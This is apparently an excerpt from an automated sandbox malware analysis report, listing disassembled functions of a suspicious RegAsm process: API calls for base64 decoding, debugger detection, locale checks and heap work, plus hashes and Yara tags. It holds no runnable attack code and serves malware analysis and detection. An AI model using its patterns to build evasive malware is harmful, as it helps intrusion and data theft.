LocalAlloc.KERNEL32(00000040,6d@,?,?,00406436,00000000,?,?), ref: 00406DAD
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,6d@,00000000,00000000), ref: 00406DC3
LocalFree.KERNEL32(00000000,?,?,00406436,00000000,?,?), ref: 00406DD2

Strings

6d@, xrefs: 00406D89, 00406D90, 00406DA9, 00406DBB

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: 6d@
API String ID: 4291131564-2833952515
Opcode ID: 02b58900235b0196ec08c701eadce19cda59cf3120f889d259e5e6ce7ce437a4
Instruction ID: 35462828adb5915c5548addc00fbf745a4e4b910dafd665b5daec6d51a41da74
Opcode Fuzzy Hash: 02b58900235b0196ec08c701eadce19cda59cf3120f889d259e5e6ce7ce437a4
Instruction Fuzzy Hash: 7E012874201234BBCB215F56CD89E8BBFADEF4BBA1B104012F90AAA250D3708950CBA1

Function 1B3D3AA3 Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

GetUserDefaultLCID.KERNEL32 ref: 1B5C365A
IsValidCodePage.KERNEL32(00000000), ref: 1B5C3698
IsValidLocale.KERNEL32(?,00000001), ref: 1B5C36AB
GetLocaleInfoW.KERNEL32(?,00001001,?,00000040), ref: 1B5C36F3
GetLocaleInfoW.KERNEL32(?,00001002,?,00000040), ref: 1B5C370E

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID: Locale$InfoValid$CodeDefaultPageUser
String ID:
API String ID: 3475089800-0
Opcode ID: 46910dfb8052f3fa4cc81aedef50bf6b8a804fc691275e2473ada025c6b1d0df
Instruction ID: 7aa4c23254d1b6202a9a9bd595167bc7ff55bd3ed1829a10e70cfadba0ff00c8
Opcode Fuzzy Hash: 46910dfb8052f3fa4cc81aedef50bf6b8a804fc691275e2473ada025c6b1d0df
Instruction Fuzzy Hash: 48516EB5A00219ABEF01DBE5CCC1AEF73BEAF54700F510569E554EB281E770EA45CB60

Function 0041BC07 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 0041E9BB
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0041E9D0
UnhandledExceptionFilter.KERNEL32(00429F88), ref: 0041E9DB
GetCurrentProcess.KERNEL32(C0000409), ref: 0041E9F7
TerminateProcess.KERNEL32(00000000), ref: 0041E9FE

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a48f1affe5db871b7380ca2f956866452674b9d3bcd10cdaff11505200f07712
Instruction ID: 8b8cc161ed15990f9c681962197f2494a49076de0bcb6b23e90cfd9797651081
Opcode Fuzzy Hash: a48f1affe5db871b7380ca2f956866452674b9d3bcd10cdaff11505200f07712
Instruction Fuzzy Hash: F221FEBCA01204DBC310EF65ED456843BB6FB0B755F80242AE5088B2B0F77489C6CF19

Function 0040245C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 52encryptionCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00402481
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,00000000,?,00000000,00000000), ref: 004024A7
CryptStringToBinaryA.CRYPT32(00000104,00000000,00000001,?,?,00000000,00000000), ref: 004024C1

Strings

UNK, xrefs: 004024D0

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: BinaryCryptString$memset
String ID: UNK
API String ID: 1505698593-448974810
Opcode ID: 8ece9c8dcaed3273033bfb9c048315bb79fe38adea9fe4cdfa896783bee5dabe
Instruction ID: de8384b14a3a846379526ad1ac4bf1862997ee543d3ac2cb677290237cfc07eb
Opcode Fuzzy Hash: 8ece9c8dcaed3273033bfb9c048315bb79fe38adea9fe4cdfa896783bee5dabe
Instruction Fuzzy Hash: AB014FB250011CBEE711EB95DDC1DFF77BCEB44658F0000ABFA04A2181E6B8AE454AB9

Function 00411A55 Relevance: 6.1, APIs: 4, Instructions: 53memoryencryptionCOMMON

Download Yara Rule

APIs

CryptBinaryToStringA.CRYPT32(?,?,40000001,00000000,?), ref: 00411A79
GetProcessHeap.KERNEL32(00000000,?,?,00404415,?,?,?,?,?,?), ref: 00411A86
HeapAlloc.KERNEL32(00000000,?,00404415,?,?,?,?,?,?), ref: 00411A8D

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$AllocBinaryCryptProcessString
String ID:
API String ID: 1871034439-0
Opcode ID: 4c6098429221ccbcb44ac738b2c8e44e81f2451ed6a523fb9493a19344a9c325
Instruction ID: 289f294398e45272a9fab8d965c880c23c8db973fedf51e740ec5c326e7486dc
Opcode Fuzzy Hash: 4c6098429221ccbcb44ac738b2c8e44e81f2451ed6a523fb9493a19344a9c325
Instruction Fuzzy Hash: D1015775111209BFDF118FA1DC449EB7FAAEF8A390B10442AFA4593220D7359991EB60

Function 1B493770 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction ID: e6b0628513fbd5af6753b65904fa629f47aae4e17089f764986255a4fd806659
Opcode Fuzzy Hash: f4ccdf9b743d75f8252b2851f4553c50142fb9d6052622b86404dbf4ff0d5e94
Instruction Fuzzy Hash: B2E09A77008700ABCE125B51DD46E8ABBA6BF48710F840C18F5C521570C672A870AB41

Function 1B4B37E0 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction ID: 12f31b727deb5ebdb01053f74c0863ac58cfd292374ce10ff2fed3c21c3423e3
Opcode Fuzzy Hash: 163b20eed04c21f543b465dbf508e26d1b36e382aec2e71a79acdea727c2a907
Instruction Fuzzy Hash: 72E09A77008740ABCF125B52DC46E8ABBA6AF48314F840C18F58561470C6B2A8B1AB41

Function 1B475910 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?), xrefs: 1B47597E

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID: INSERT INTO '%q'.'%q_idx'(segid,term,pgno) VALUES(?,?,?)
API String ID: 0-143322027
Opcode ID: 66e8c5fa6e4c7b02e6a930f7300dd94e90415b904a34f6c7292f8a206a62c312
Instruction ID: 0a7585a4be2bcff6a0b8cf214666cc21f9d85e0dd7e03e02fce683f1a5a5bbb0
Opcode Fuzzy Hash: 66e8c5fa6e4c7b02e6a930f7300dd94e90415b904a34f6c7292f8a206a62c312
Instruction Fuzzy Hash: 98119AB6500646BFEB109F59CC85FC6BBADFF44324F408148F5089B251C7B2B4A4CBA0

Function 1B48D3B0 Relevance: 4.6, APIs: 3, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 77d5929d70db2c729be1199101cb249619ac26408ad4a7e95a09263eccf9227e
Instruction ID: f0d5514ca5f458bb5fe108f558ffcde8a16857cfdd055cf7c980b08d4e94796b
Opcode Fuzzy Hash: 77d5929d70db2c729be1199101cb249619ac26408ad4a7e95a09263eccf9227e
Instruction Fuzzy Hash: 3B315EB5601211ABE704DF69DC81E96B3E9FF48615F04852DF989C3341E771F910CAA1

Function 1B4755B0 Relevance: 4.6, APIs: 3, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.2948514769.000000001B3D8000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B3D0000, based on PE: true

Associated: 00000003.00000002.2948466177.000000001B3D0000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B3D1000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B536000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2948514769.000000001B5DD000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5DF000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949428646.000000001B5E8000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949558249.000000001B612000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2949605614.000000001B61F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1b3d0000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4155704ca7d2532665aa09ff65b7ec262e63abb0060c42f09d0e9919ca41bc3
Instruction ID: 723e8782fe97ec777a4884539b57c866f8e64ccca14341a3638d3f54d8eda6ec
Opcode Fuzzy Hash: e4155704ca7d2532665aa09ff65b7ec262e63abb0060c42f09d0e9919ca41bc3
Instruction Fuzzy Hash: EA318AB5600381AFEB10EF29DC81B9677E9EF84314F108829F9498B351E771E850CB91

Function 0040EE43 Relevance: 93.4, APIs: 62, Instructions: 416memorystringCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040EE48

Part of subcall function 0040ED48: _EH_prolog.MSVCRT ref: 0040ED4D
Part of subcall function 0040ED48: lstrlenA.KERNEL32(?,6CA27FA0,75AA5460,00000000), ref: 0040ED71
Part of subcall function 0040ED48: strchr.MSVCRT ref: 0040ED83

GetProcessHeap.KERNEL32(00000008,?,?,6CA27FA0,00000000), ref: 0040EE97
HeapAlloc.KERNEL32(00000000,?,6CA27FA0,00000000), ref: 0040EE9E
GetProcessHeap.KERNEL32(00000000,?,?,6CA27FA0,00000000), ref: 0040EEB3
HeapFree.KERNEL32(00000000,?,6CA27FA0,00000000), ref: 0040EEBA
strcpy_s.MSVCRT ref: 0040EEF3
GetProcessHeap.KERNEL32(00000000,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF0A
HeapFree.KERNEL32(00000000,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF11
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF37
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF3E
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF45
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF4C
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF61
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF68
strcpy_s.MSVCRT ref: 0040EF7B
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF8C
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EF93
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0), ref: 0040EFAE
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EFB5
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0), ref: 0040EFBC
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EFC3
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0), ref: 0040EFD8
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040EFDF
strcpy_s.MSVCRT ref: 0040EFF2
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F003
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040F00A
GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F02C
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F033
GetProcessHeap.KERNEL32(00000008,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F03A
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F041
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F059
HeapFree.KERNEL32(00000000,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F060
strcpy_s.MSVCRT ref: 0040F073
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F084
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F08B

Part of subcall function 0040EC9A: strlen.MSVCRT ref: 0040ECB1

lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F094
GetProcessHeap.KERNEL32(00000008,00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F0A4
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F0AB
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F0D7
strcpy_s.MSVCRT ref: 0040F0FB
GetProcessHeap.KERNEL32(00000000,?,00000001,00000000,00000001,00000000,?,?,00000000), ref: 0040F124
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F12B
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F130
GetProcessHeap.KERNEL32(00000008,00000001,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F13B
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F142
GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F153
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,75AA5460,?,6CA27FA0,00000000), ref: 0040F15A
strcpy_s.MSVCRT ref: 0040F168
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F174
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040F17B
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F1A1
HeapFree.KERNEL32(00000000), ref: 0040F1A8
GetProcessHeap.KERNEL32(00000008,00000010), ref: 0040F1AF
HeapAlloc.KERNEL32(00000000), ref: 0040F1B6
strcpy_s.MSVCRT ref: 0040F1CE
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F1DF
HeapFree.KERNEL32(00000000), ref: 0040F1E6
strlen.MSVCRT ref: 0040F234
GetProcessHeap.KERNEL32(00000000,?), ref: 0040F278
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,75AA5460), ref: 0040F27F

Part of subcall function 0040ED48: strchr.MSVCRT ref: 0040EDA7
Part of subcall function 0040ED48: lstrlenA.KERNEL32(?), ref: 0040EDC5
Part of subcall function 0040ED48: GetProcessHeap.KERNEL32(00000008,-00000001), ref: 0040EDD2
Part of subcall function 0040ED48: HeapAlloc.KERNEL32(00000000), ref: 0040EDD9
Part of subcall function 0040ED48: strcpy_s.MSVCRT ref: 0040EE14

GetProcessHeap.KERNEL32(00000000,?), ref: 0040F2CB
HeapFree.KERNEL32(00000000), ref: 0040F2D2

Memory Dump Source

Source File: 00000003.00000002.2942073770.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.2942073770.0000000000453000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000048E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000491000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000497000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004B6000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.00000000004D5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000056E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.000000000062F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.2942073770.0000000000640000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Heap$Process$Free$Allocstrcpy_s$lstrlen$H_prologstrchrstrlen
String ID:
API String ID: 2599614518-0
Opcode ID: 498caa5b69c167346c8db884e038b5c5716db4a2d432c3f7d2a9d95b1d25a1c4
Instruction ID: 69a46e85285044ff5a5d746cb6c2e60bc371a34f2ff32be07d2c0eae58056a70
Opcode Fuzzy Hash: 498caa5b69c167346c8db884e038b5c5716db4a2d432c3f7d2a9d95b1d25a1c4
Instruction Fuzzy Hash: 9FE139B6C10219EBDF10AFE1CC499BEBB79BB0A304F10082AF215B7191DB794954DB65

Function 0040C72A Relevance: 73.9, APIs: 32, Strings: 10, Instructions: 370stringmemoryCOMMON

Download Yara Rule

APIs

_EH_prolog.MSVCRT ref: 0040C72F

Part of subcall function 004105CC: lstrcpy.KERNEL32(00000000,00000000), ref: 004105F6

Part of subcall function 004119CA: SHGetFolderPathA.SHELL32(00000000,00426D17,00000000,00000000,?), ref: 004119FB

Part of subcall function 004106D1: _EH_prolog.MSVCRT ref: 004106D6
Part of subcall function 004106D1: lstrcpy.KERNEL32(00000000), ref: 00410722
Part of subcall function 004106D1: lstrcat.KERNEL32(?,?), ref: 0041072C

Part of subcall function 0041068A: lstrcpy.KERNEL32(00000000,?), ref: 004106C3

Part of subcall function 00410745: _EH_prolog.MSVCRT ref: 0041074A
Part of subcall function 00410745: lstrlenA.KERNEL32(?,?,?,?,?,004185FE,?,?,00427BEC,?,00000000,00427727), ref: 00410772
